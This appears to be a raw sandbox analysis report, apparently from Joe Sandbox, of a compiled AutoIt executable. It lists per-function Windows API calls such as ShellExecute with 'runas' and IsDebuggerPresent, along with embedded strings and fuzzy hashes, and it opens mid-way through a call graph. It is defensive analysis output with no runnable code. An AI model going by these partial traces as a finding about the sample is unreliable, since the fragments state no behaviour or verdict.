calls 94360 e7b495 94348->94360 94349 e7ba85 48 API calls 94349->94360 94352 e7b9e4 94384 eb26bc 88 API calls 4 library calls 94352->94384 94353 ee3973 94353->94344 94356 ee3989 94383 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94356->94383 94358 ee3909 94361 e76b4a 48 API calls 94358->94361 94359 e7bb85 48 API calls 94359->94360 94360->94342 94360->94347 94360->94348 94360->94349 94360->94352 94360->94358 
94360->94359 94364 e7bdfa 48 API calls 94360->94364 94367 ee3939 ___crtGetEnvironmentStringsW 94360->94367 94376 e7c413 59 API calls 94360->94376 94377 e7bc74 48 API calls 94360->94377 94379 e7c6a5 49 API calls 94360->94379 94380 e7c799 48 API calls ___crtGetEnvironmentStringsW 94360->94380 94362 ee3914 94361->94362 94366 e8f4ea 48 API calls 94362->94366 94365 e7b66c CharUpperBuffW 94364->94365 94365->94360 94366->94367 94381 eb26bc 88 API calls 4 library calls 94367->94381 94368->94337 94369->94337 94370->94337 94372 e8f4ea 48 API calls 94371->94372 94373 e76b34 94372->94373 94374 e76b4a 48 API calls 94373->94374 94375 e76b43 94374->94375 94375->94360 94376->94360 94377->94360 94378->94344 94379->94360 94380->94360 94381->94353 94382->94356 94383->94353 94384->94353 94386 ee418d EnumResourceNamesW 94385->94386 94387 e7403c LoadImageW 94385->94387 94388 e73ee1 RegisterClassExW 94386->94388 94387->94388 94389 e73f53 7 API calls 94388->94389 94389->93438 94391 e74c44 94390->94391 94392 ee3c33 94390->94392 94391->93444 94416 eb5819 61 API calls _W_store_winword 94391->94416 94392->94391 94393 ee3c3c DestroyIcon 94392->94393 94393->94391 94395 e751cb 94394->94395 94415 e752a2 Mailbox 94394->94415 94396 e76b0f 48 API calls 94395->94396 94397 e751d9 94396->94397 94398 e751e6 94397->94398 94399 ee3ca1 LoadStringW 94397->94399 94400 e76a63 48 API calls 94398->94400 94402 ee3cbb 94399->94402 94401 e751fb 94400->94401 94401->94402 94403 e7520c 94401->94403 94404 e7510d 48 API calls 94402->94404 94405 e752a7 94403->94405 94406 e75216 94403->94406 94409 ee3cc5 94404->94409 94407 e76eed 48 API calls 94405->94407 94408 e7510d 48 API calls 94406->94408 94412 e75220 _memset _wcscpy 94407->94412 94408->94412 94410 e7518c 48 API calls 94409->94410 94409->94412 94411 ee3ce7 94410->94411 94414 e7518c 48 API calls 94411->94414 94413 e75288 Shell_NotifyIconW 94412->94413 94413->94415 94414->94412 94415->93449 94416->93444 94418 e7f130 94417->94418 94421 e7fe30 335 API calls 94418->94421 
94426 e7f199 94418->94426 94419 e7f3dd 94422 ee87c8 94419->94422 94432 e7f3f2 94419->94432 94467 e7f431 Mailbox 94419->94467 94420 e7f595 94428 e7d7f7 48 API calls 94420->94428 94420->94467 94423 ee8728 94421->94423 94590 ebcc5c 86 API calls 4 library calls 94422->94590 94423->94426 94587 ebcc5c 86 API calls 4 library calls 94423->94587 94424 e7fe30 335 API calls 94424->94467 94426->94419 94426->94420 94429 e7d7f7 48 API calls 94426->94429 94461 e7f229 94426->94461 94430 ee87a3 94428->94430 94434 ee8772 94429->94434 94589 e90f0a 52 API calls __cinit 94430->94589 94458 e7f418 94432->94458 94591 eb9af1 48 API calls 94432->94591 94433 ee8b1b 94448 ee8bcf 94433->94448 94449 ee8b2c 94433->94449 94588 e90f0a 52 API calls __cinit 94434->94588 94436 e7f770 94442 ee8a45 94436->94442 94459 e7f77a 94436->94459 94438 e7d6e9 55 API calls 94438->94467 94439 ee8c53 94605 ebcc5c 86 API calls 4 library calls 94439->94605 94440 ee8810 94592 eceef8 335 API calls 94440->94592 94441 e7fe30 335 API calls 94462 e7f6aa 94441->94462 94597 e8c1af 48 API calls 94442->94597 94443 ebcc5c 86 API calls 94443->94467 94444 ee8b7e 94600 ece40a 335 API calls Mailbox 94444->94600 94602 ebcc5c 86 API calls 4 library calls 94448->94602 94599 ecf5ee 335 API calls 94449->94599 94450 ee8beb 94603 ecbdbd 335 API calls Mailbox 94450->94603 94454 e81b90 48 API calls 94454->94467 94455 e81b90 48 API calls 94455->94467 94458->94433 94458->94462 94458->94467 94459->94454 94460 ee8c00 94481 e7f537 Mailbox 94460->94481 94604 ebcc5c 86 API calls 4 library calls 94460->94604 94461->94419 94461->94420 94461->94458 94461->94467 94462->94436 94462->94441 94464 e7fce0 94462->94464 94462->94467 94462->94481 94463 ee8823 94463->94458 94466 ee884b 94463->94466 94464->94481 94601 ebcc5c 86 API calls 4 library calls 94464->94601 94593 ecccdc 48 API calls 94466->94593 94467->94424 94467->94438 94467->94439 94467->94443 94467->94444 94467->94450 94467->94455 94467->94464 94467->94481 94586 e7dd47 48 API calls 

                                                                        Control-flow Graph
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cc31aec3d8bb350e3a726dde465cb367e64b8999a9985a0485dced6496cfa58
                                                                        • Instruction ID: a4aaec9244466c32deea0d069c8050ace76a2dc57c08f762c23f3ef9adbf83af
                                                                        • Opcode Fuzzy Hash: 8cc31aec3d8bb350e3a726dde465cb367e64b8999a9985a0485dced6496cfa58
                                                                        • Instruction Fuzzy Hash: 17323875A022288BDF24CF54ED816E9B7F5FB4A314F1851DAE40AE7A91D7309E80CF52

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00E73AA3,?), ref: 00E73D45
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00E73AA3,?), ref: 00E73D57
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F31148,00F31130,?,?,?,?,00E73AA3,?), ref: 00E73DC8
                                                                          • Part of subcall function 00E76430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E73DEE,00F31148,?,?,?,?,?,00E73AA3,?), ref: 00E76471
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00E73AA3,?), ref: 00E73E48
                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F228F4,00000010), ref: 00EE1CCE
                                                                        • SetCurrentDirectoryW.KERNEL32(?,00F31148,?,?,?,?,?,00E73AA3,?), ref: 00EE1D06
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F0DAB4,00F31148,?,?,?,?,?,00E73AA3,?), ref: 00EE1D89
                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00E73AA3), ref: 00EE1D90
                                                                          • Part of subcall function 00E73E6E: GetSysColorBrush.USER32(0000000F), ref: 00E73E79
                                                                          • Part of subcall function 00E73E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00E73E88
                                                                          • Part of subcall function 00E73E6E: LoadIconW.USER32(00000063), ref: 00E73E9E
                                                                          • Part of subcall function 00E73E6E: LoadIconW.USER32(000000A4), ref: 00E73EB0
                                                                          • Part of subcall function 00E73E6E: LoadIconW.USER32(000000A2), ref: 00E73EC2
                                                                          • Part of subcall function 00E73E6E: RegisterClassExW.USER32(?), ref: 00E73F30
                                                                          • Part of subcall function 00E736B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E736E6
                                                                          • Part of subcall function 00E736B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E73707
                                                                          • Part of subcall function 00E736B8: ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E7371B
                                                                          • Part of subcall function 00E736B8: ShowWindow.USER32(00000000,?,?,?,?,00E73AA3,?), ref: 00E73724
                                                                          • Part of subcall function 00E74FFC: _memset.LIBCMT ref: 00E75022
                                                                          • Part of subcall function 00E74FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E750CB
                                                                        Strings
                                                                        • runas, xrefs: 00EE1D84
                                                                        • This is a third-party compiled AutoIt script., xrefs: 00EE1CC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 438480954-3287110873
                                                                        • Opcode ID: 120e101ca279de62c51f1c5bf66cc0e44bf550e33955bafc0f70e1f2b93d22c2
                                                                        • Instruction ID: c87315370dd9b29ff77f2ae8caaa69563b3809c176b9ea8ea6103a2716779579
                                                                        • Opcode Fuzzy Hash: 120e101ca279de62c51f1c5bf66cc0e44bf550e33955bafc0f70e1f2b93d22c2
                                                                        • Instruction Fuzzy Hash: 5A511831A04348AECB11BBB0DC41DED7BBAEF05724F10E065F609761A2DB708645F722

                                                                        Control-flow Graph
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 00E8DDEC
                                                                        • GetCurrentProcess.KERNEL32(00000000,00F0DC38,?,?), ref: 00E8DEAC
                                                                        • GetNativeSystemInfo.KERNELBASE(?,00F0DC38,?,?), ref: 00E8DF01
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E8DF0C
                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E8DF1F
                                                                        • GetSystemInfo.KERNEL32(?,00F0DC38,?,?), ref: 00E8DF29
                                                                        • GetSystemInfo.KERNEL32(?,00F0DC38,?,?), ref: 00E8DF35
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                        • String ID:
                                                                        • API String ID: 3851250370-0
                                                                        • Opcode ID: 4f46228802f1111ed2d8cec6bb240952a07945bab9fa06c5fb0b5efe28cff050
                                                                        • Instruction ID: 37d1abd26c3f40da7d1ffbb1cc6c85eac522c0e38c3dd1d8f6a404b5ed847819
                                                                        • Opcode Fuzzy Hash: 4f46228802f1111ed2d8cec6bb240952a07945bab9fa06c5fb0b5efe28cff050
                                                                        • Instruction Fuzzy Hash: FF61C2B190A3C8DFCF15DF6898C01E9BFB46F29304B1999D8D84DAF287C624C908CB65

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E7449E,?,?,00000000,00000001), ref: 00E7407B
                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E7449E,?,?,00000000,00000001), ref: 00E74092
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00E7449E,?,?,00000000,00000001,?,?,?,?,?,?,00E741FB), ref: 00EE4F1A
                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00E7449E,?,?,00000000,00000001,?,?,?,?,?,?,00E741FB), ref: 00EE4F2F
                                                                        • LockResource.KERNEL32(00E7449E,?,?,00E7449E,?,?,00000000,00000001,?,?,?,?,?,?,00E741FB,00000000), ref: 00EE4F42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: SCRIPT
                                                                        • API String ID: 3051347437-3967369404
                                                                        • Opcode ID: 3aba6759914c1dc97f7737dd34b9a8a93dbba3b65711ec2e5532f17c4c05366d
                                                                        • Instruction ID: 7c25433e17cf9ee48cefcd458f77e6756b166446ba76148e2383b12939cfbbef
                                                                        • Opcode Fuzzy Hash: 3aba6759914c1dc97f7737dd34b9a8a93dbba3b65711ec2e5532f17c4c05366d
                                                                        • Instruction Fuzzy Hash: 13115AB0304701AFE7258B26EC48F677BBAEBC5B55F10812CF606A62A0DB71DC04CA61
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,I/), ref: 00EB6CB9
                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00EB6CCA
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB6CDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID: I/
                                                                        • API String ID: 48322524-530815126
                                                                        • Opcode ID: f86de327efdaf8f154fcb3c43b77675aec03186f59dc4b0bb2e00aa5c26b7be7
                                                                        • Instruction ID: 391491f4e4a069cbeaead9fb20d193d0a989b6a321e9283ca06f2b9b0bfbee70
                                                                        • Opcode Fuzzy Hash: f86de327efdaf8f154fcb3c43b77675aec03186f59dc4b0bb2e00aa5c26b7be7
                                                                        • Instruction Fuzzy Hash: 7BE0D8318154105B82106738EC0D4FA7F6DDB45339F100705F571E11D0E774E90489D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID:
                                                                        • API String ID: 3964851224-0
                                                                        • Opcode ID: 744100a0e10b4910d7fba305559d9cb8d29d4bf2ddb6db645bd2ee501175313a
                                                                        • Instruction ID: ab089166401362df5a5ee917ac36948bde6da7cd587b8110d20b796608229d9c
                                                                        • Opcode Fuzzy Hash: 744100a0e10b4910d7fba305559d9cb8d29d4bf2ddb6db645bd2ee501175313a
                                                                        • Instruction Fuzzy Hash: EE926C706083419FD724EF28C480B6AB7E1BF88708F14985DE99EAB362D771ED45CB52
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7E959
                                                                        • timeGetTime.WINMM ref: 00E7EBFA
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7ED2E
                                                                        • TranslateMessage.USER32(?), ref: 00E7ED3F
                                                                        • DispatchMessageW.USER32(?), ref: 00E7ED4A
                                                                        • LockWindowUpdate.USER32(00000000), ref: 00E7ED79
                                                                        • DestroyWindow.USER32 ref: 00E7ED85
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E7ED9F
                                                                        • Sleep.KERNEL32(0000000A), ref: 00EE5270
                                                                        • TranslateMessage.USER32(?), ref: 00EE59F7
                                                                        • DispatchMessageW.USER32(?), ref: 00EE5A05
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EE5A19
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                        • API String ID: 2641332412-570651680
                                                                        • Opcode ID: 51e35e464f7f1b4a66d20a9c10c768011068aac147c8a8bd173cfbede73bdce6
                                                                        • Instruction ID: 4dc0f268a6fff83df07dc8f95ea3eac6f8ef9ff20795b3fdc0110cfd37aa6a51
                                                                        • Opcode Fuzzy Hash: 51e35e464f7f1b4a66d20a9c10c768011068aac147c8a8bd173cfbede73bdce6
                                                                        • Instruction Fuzzy Hash: A262E971508384CFD724DF24C885BAA77E5BF48308F14A9ADF94EAB292D771D844CB52
                                                                        APIs
                                                                        • ___createFile.LIBCMT ref: 00EA5EC3
                                                                        • ___createFile.LIBCMT ref: 00EA5F04
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EA5F2D
                                                                        • __dosmaperr.LIBCMT ref: 00EA5F34
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00EA5F47
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EA5F6A
                                                                        • __dosmaperr.LIBCMT ref: 00EA5F73
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EA5F7C
                                                                        • __set_osfhnd.LIBCMT ref: 00EA5FAC
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA6016
                                                                        • __close_nolock.LIBCMT ref: 00EA603C
                                                                        • __chsize_nolock.LIBCMT ref: 00EA606C
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA607E
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA6176
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA618B
                                                                        • __close_nolock.LIBCMT ref: 00EA61EB
                                                                          • Part of subcall function 00E9EA9C: CloseHandle.KERNELBASE(00000000,00F1EEF4,00000000,?,00EA6041,00F1EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E9EAEC
                                                                          • Part of subcall function 00E9EA9C: GetLastError.KERNEL32(?,00EA6041,00F1EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E9EAF6
                                                                          • Part of subcall function 00E9EA9C: __free_osfhnd.LIBCMT ref: 00E9EB03
                                                                          • Part of subcall function 00E9EA9C: __dosmaperr.LIBCMT ref: 00E9EB25
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • __lseeki64_nolock.LIBCMT ref: 00EA620D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EA6342
                                                                        • ___createFile.LIBCMT ref: 00EA6361
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EA636E
                                                                        • __dosmaperr.LIBCMT ref: 00EA6375
                                                                        • __free_osfhnd.LIBCMT ref: 00EA6395
                                                                        • __invoke_watson.LIBCMT ref: 00EA63C3
                                                                        • __wsopen_helper.LIBCMT ref: 00EA63DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                        • String ID: @
                                                                        • API String ID: 3896587723-2766056989
                                                                        • Opcode ID: 2f99f574d2acc2bf12b477f5fef4b76a3a1443917cab72828040b4739bfc54e7
                                                                        • Instruction ID: 0b6a16542d6fd691b0d9e4725ba683e0a59d0bc9cf52e9f172d6d44d407cc7c2
                                                                        • Opcode Fuzzy Hash: 2f99f574d2acc2bf12b477f5fef4b76a3a1443917cab72828040b4739bfc54e7
                                                                        • Instruction Fuzzy Hash: 5E2204729006099FEF259F68CC857FE7B61EB1B328F285229E521BF2E1C635AD40C751

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _wcscpy.LIBCMT ref: 00EBFA96
                                                                        • _wcschr.LIBCMT ref: 00EBFAA4
                                                                        • _wcscpy.LIBCMT ref: 00EBFABB
                                                                        • _wcscat.LIBCMT ref: 00EBFACA
                                                                        • _wcscat.LIBCMT ref: 00EBFAE8
                                                                        • _wcscpy.LIBCMT ref: 00EBFB09
                                                                        • __wsplitpath.LIBCMT ref: 00EBFBE6
                                                                        • _wcscpy.LIBCMT ref: 00EBFC0B
                                                                        • _wcscpy.LIBCMT ref: 00EBFC1D
                                                                        • _wcscpy.LIBCMT ref: 00EBFC32
                                                                        • _wcscat.LIBCMT ref: 00EBFC47
                                                                        • _wcscat.LIBCMT ref: 00EBFC59
                                                                        • _wcscat.LIBCMT ref: 00EBFC6E
                                                                          • Part of subcall function 00EBBFA4: _wcscmp.LIBCMT ref: 00EBC03E
                                                                          • Part of subcall function 00EBBFA4: __wsplitpath.LIBCMT ref: 00EBC083
                                                                          • Part of subcall function 00EBBFA4: _wcscpy.LIBCMT ref: 00EBC096
                                                                          • Part of subcall function 00EBBFA4: _wcscat.LIBCMT ref: 00EBC0A9
                                                                          • Part of subcall function 00EBBFA4: __wsplitpath.LIBCMT ref: 00EBC0CE
                                                                          • Part of subcall function 00EBBFA4: _wcscat.LIBCMT ref: 00EBC0E4
                                                                          • Part of subcall function 00EBBFA4: _wcscat.LIBCMT ref: 00EBC0F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 2955681530-2806939583
                                                                        • Opcode ID: b6e8129612d954453f91b97233b0109c4ccf6e0cd2f9fe9849866297f9ff2dd2
                                                                        • Instruction ID: d3bc8a926f723c3e6e53676815391b6e14b3d39a93de4e849f9ed3e8c5a5a719
                                                                        • Opcode Fuzzy Hash: b6e8129612d954453f91b97233b0109c4ccf6e0cd2f9fe9849866297f9ff2dd2
                                                                        • Instruction Fuzzy Hash: D6919272504305AFDF20EB54C891F9BB3E8BF84314F049869F959A7292DB34EA44CB92

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E73F86
                                                                        • RegisterClassExW.USER32(00000030), ref: 00E73FB0
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E73FC1
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00E73FDE
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E73FEE
                                                                        • LoadIconW.USER32(000000A9), ref: 00E74004
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E74013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: 71cbca9af7477d2d9be7cdf7edc8b186eea931e4f6a5bb7d8380b4dc9ec1b624
                                                                        • Instruction ID: 6826317475fe3add0c08a1b00ef13aede7d87393d12a1a71aa4c606fe2e71bd6
                                                                        • Opcode Fuzzy Hash: 71cbca9af7477d2d9be7cdf7edc8b186eea931e4f6a5bb7d8380b4dc9ec1b624
                                                                        • Instruction Fuzzy Hash: 1821B4B5904218AFDB009FA5EC8ABDDBFB6FB48710F00411AF515A62A0D7B44548DF91

                                                                        Control-flow Graph

                                                                        APIs
